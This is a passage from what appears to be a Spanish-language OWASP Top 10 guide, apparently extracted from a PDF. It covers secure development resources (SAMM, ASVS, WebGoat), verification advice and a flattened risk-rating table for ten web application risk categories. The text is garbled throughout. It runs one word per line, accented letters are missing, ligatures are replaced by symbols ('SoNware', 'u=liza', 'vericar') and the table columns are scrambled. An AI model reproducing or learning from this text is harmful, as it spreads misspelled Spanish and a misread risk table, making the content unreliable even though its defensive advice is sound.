requisitos
de
seguridad
de
su(s)
aplicacin(es).
Si
est
externalizando,
considere
el
Anexo:
Contrato
de
SoNware
Seguro.
Arquitectura
de
seguridad
en
aplicaciones
Es
mucho
ms
rentable
disear
la
seguridad
desde
el
principio
que
aadir
seguridad
a
su(s)
aplicacin(es).
OWASP
recomienda
la
Gua
de
Desarrollo
OWASP,
y
las
hojas
de
prevencin
de
trampas
OWASP
como
puntos
de
inicio
p=mos
para
guiarlo
en
el
diseo
de
la
seguridad.
Controles
de
Seguridad
Estndar
Ciclo
de
vida
de
desarrollo
seguro
Para
mejorar
el
proceso
que
su
organizacin
u=liza
al
construir
aplicaciones,
OWASP
recomienda
el
Modelo
de
Garana
de
la
Madurez
del
SoNware
OWASP
SoNware
Assurance
Maturity
Model
(SAMM).
Este
modelo
ayuda
a
las
organizaciones
a
formular
e
implementar
estrategias
para
el
soNware
seguro
adaptado
a
los
riesgos
especcos
para
su
organizacin.
Educacin
de
la
Seguridad
en
Aplicaciones
El
proyecto
educacional
OWASP
proporciona
materiales
de
formacin
para
ayudar
a
educar
desarrolladores
en
seguridad
en
aplicaciones
web,
y
ha
compilado
una
gran
nmero
de
presentaciones
educa=vas.
Para
una
formacin
prc=ca
acerca
de
vulnerabilidades,
pruebe
los
proyectos
OWASP
WebGoat,
WebGoat.net,
o
el
OWASP
Broken
Web
Applica=on
Project.
Para
mantenerse
al
da,
acuda
a
una
Conferencia
AppSec
OWASP,
Conferencia
de
Entrenamiento
OWASP
o
a
reuniones
de
los
captulos
OWASP
locales.
Hay
un
gran
nmero
de
recursos
adicionales
OWASP
para
su
uso.
Visite
por
favor
la
Pgina
de
Proyectos
OWASP,
que
lista
todos
los
proyectos
de
OWASP,
organizados
por
la
calidad
de
la
distribucin
de
cada
proyecto
(Versin
Final,
Beta,
o
Alfa).
La
mayora
de
recursos
de
OWASP
estn
disponibles
en
nuestro
wiki,
y
muchos
otros
documentos
del
OWASP
se
pueden
encargar
tanto
en
copia
|sica
como
en
eBooks.
+V
Organcese
Para
vericar
la
seguridad
de
una
aplicacin
web
que
ha
desarrollado,
o
que
est
considerando
comprar,
OWASP
recomienda
que
revise
el
cdigo
de
la
aplicacin
(si
est
disponible),
y
tambin
evaluar
la
aplicacin.
OWASP
recomienda
una
combinacin
de
anlisis
de
seguridad
de
cdigo
y
pruebas
de
intrusin
siempre
que
sean
posibles,
ya
que
le
permita
aprovechar
las
fortalezas
de
ambas
tcnicas,
y
adems
los
dos
enfoques
se
complementan
entre
s.
Las
herramientas
para
ayudar
en
el
proceso
de
vericacin
pueden
mejorar
la
eciencia
y
efec=vidad
de
un
analista
experto.
Las
herramientas
de
evaluacin
de
OWASP
estn
enfocadas
en
ayudar
a
un
experto
en
ser
ms
ecaz,
ms
que
en
tratar
de
automa=zar
el
proceso
de
anlisis.
Cmo
estandarizar
la
vericacin
de
seguridad
de
las
aplicaciones:
Para
ayudar
a
las
organizaciones
a
desarrollar
cdigo
de
forma
consistente
y
con
un
nivel
denido
de
rigor,
al
momento
de
evaluar
la
seguridad
de
las
aplicaciones
web,
OWASP
ha
producido
los
estndares
de
vericacin
(ASVS)
de
seguridad
en
aplicaciones.
Este
documento
dene
un
estndar
de
vericacin
mnimo
para
realizar
pruebas
de
seguridad
en
aplicaciones
web.
OWASP
le
recomienda
u=lizar
los
ASVS
como
orientacin
no
solamente
para
vericar
la
seguridad
de
una
aplicacin
web,
sino
tambin
para
evaluar
que
tcnicas
son
ms
adecuadas
,
y
para
ayudarle
a
denir
y
seleccionar
un
nivel
de
rigor
en
la
comprobacin
de
seguridad
de
una
aplicacin
web.
OWASP
le
recomienda
tambin
u=lizar
los
ASVS
para
ayudar
a
denir
y
seleccionar
cualquiera
de
los
servicios
de
evaluacin
de
aplicaciones
web
que
puede
obtener
de
un
proveedor
externo.
Suite
de
Herramientas
de
Evaluacin:
El
OWASP
Live
CD
Project
ha
reunido
algunas
de
las
mejores
herramientas
de
seguridad
de
cdigo
abierto
en
un
nico
sistema
de
arranque.
Los
desarrolladores
Web,
analistas
y
profesionales
de
seguridad
pueden
arrancar
desde
este
Live
CD
y
tener
acceso
inmediato
a
una
suite
de
pruebas
de
seguridad
completa.
No
se
requiere
instalacin
o
conguracin
para
u=lizar
las
herramientas
proporcionadas
en
este
CD.
Revisin de Cdigo
+O
Comience
Enfoque
basado
en
el
catlogo
de
riesgos
Cuente
con
una
base
slida
Establecer
un
conjunto
de
pol=cas
y
estndares
que
proporcionen
una
base
de
referencia
de
seguridad
de
las
aplicaciones,
a
las
cuales
todo
el
equipo
de
desarrollo
pueda
adherirse.
Denir
un
conjunto
de
controles
de
seguridad
reu=lizables
comn
que
complementen
esas
pol=cas
y
estndares
y
proporcionen
una
gua
en
su
uso
en
el
diseo
y
desarrollo
Establecer
un
perl
de
formacin
en
seguridad
en
aplicaciones
que
sea
un
requisito,
dirigido
a
los
diferentes
roles
y
=pologas
de
desarrollo.
Integre
la
Seguridad
en
los
Procesos
Existentes
Proporcione
una
visin
de
gesCn
Ges=onar
a
travs
de
mtricas.
Manejar
las
decisiones
de
mejora
y
provisin
de
recursos
econmicos
basndose
en
las
mtricas
y
el
anlisis
de
los
datos
capturados.
Las
mtricas
incluyen
el
seguimiento
de
las
prc=cas/
ac=vidades
de
seguridad,
vulnerabilidades
presentes,
mi=gadas,
cobertura
de
la
aplicacin,
densidad
de
defectos
por
=po
y
can=dad
de
instancias,
etc.
Analizar
los
datos
de
las
ac=vidades
de
implementacin
y
vericacin
para
buscar
el
orgen
de
la
causa
y
patrones
en
las
vulnerabilidades
para
poder
conducir
as
mejoras
estratgicas
en
la
organizacin
+R
Agentes
de
Amenaza
Especco
de
la
Aplicacin
Vectores
de
Ataque
Explotabilidad
PROMEDIO
Debilidades
de
Seguridad
Frecuencia
MUY
DIFUNDIDO
0
1
Impactos
Tcnicos
Deteccin
FCIL
1
*
Impacto
MODERADO
2
2
Impactos
al
negocio
Especco
de
la
aplicacin/negocio
+F
Riesgo
Agentes
de
Amenaza
Vectores
de
Ataque
Debilidades
de
Seguridad
Explotabilidad
Prevalecencia
Detectabilidad
Impactos
Tcnicos
Impactos
al
negocio
Impacto
A1-Inyeccin
Especco
de
la
Aplicacin
FCIL
COMN
PROMEDIO
SEVERO
Especco
de
la
Aplicacin
A2-AutenCcacin
Especco
de
la
Aplicacin
PROMEDIO
DIFUNDIDA
PROMEDIO
SEVERO
Especco
de
la
Aplicacin
A3-XSS
Especco
de
la
Aplicacin
PROMEDIO
MUY DIFUNDIDA
FCIL
MODERADO
Especco
de
la
Aplicacin
A4-Ref.
Directa
insegura
Especco
de
la
Aplicacin
FCIL
COMN
FCIL
MODERADO
Especco
de
la
Aplicacin
A5-Defectuosa
Conguracin
Especco
de
la
Aplicacin
FCIL
COMN
FCIL
MODERADO
Especco
de
la
Aplicacin
A6-Exposicin
de
Datos
Sensibles
Especco
de
la
Aplicacin
DIFCIL
POCO COMN
PROMEDIO
SEVERO
Especco
de
la
Aplicacin
A7-Ausencia
Control
Funciones
Especco
de
la
Aplicacin
FCIL
COMN
PROMEDIO
MODERADO
Especco
de
la
Aplicacin
A8-CSRF
Especco
de
la
Aplicacin
PROMEDIO
COMN
FCIL
MODERADO
Especco
de
la
Aplicacin
A9-Componentes
Vulnerables
Especco
de
la
Aplicacin
PROMEDIO
DIFUNDIDA
DIFCIL
MODERADO
Especco
de
la
Aplicacin
A10-Redirecciones
Especco
de
no
validadas
la
Aplicacin
PROMEDIO
POCO COMN
FCIL
MODERADO
Especco
de
la
Aplicacin
El
proyecto
abierto
de
seguridad
en
aplicaciones
Web
(OWASP
por
sus
siglas
en
ingls)
es
una
comunidad
abierta
y
libre
de
nivel
mundial
enfocada
en
mejorara
la
seguridad
en
las
aplicaciones
de
soNware.
Nuestra
misin
es
hacer
la
seguridad
en
aplicaciones
"visible",
de
manera
que
las
organizaciones
pueden
hacer
decisiones
informadas
sobre
los
riesgos
en
la
seguridad
de
aplicaciones.
Todo
mundo
es
libre
de
par=cipar
en
OWASP
y
en
todos
los
materiales
disponibles
bajo
una
licencia
de
soNware
libre
y
abierto.
La
fundacin
OWASP
es
una
organizacin
sin
nimo
de
lucro
501c3
que
asegura
la
disponibilidad
y
apoyo
permanente
para
nuestro
trabajo.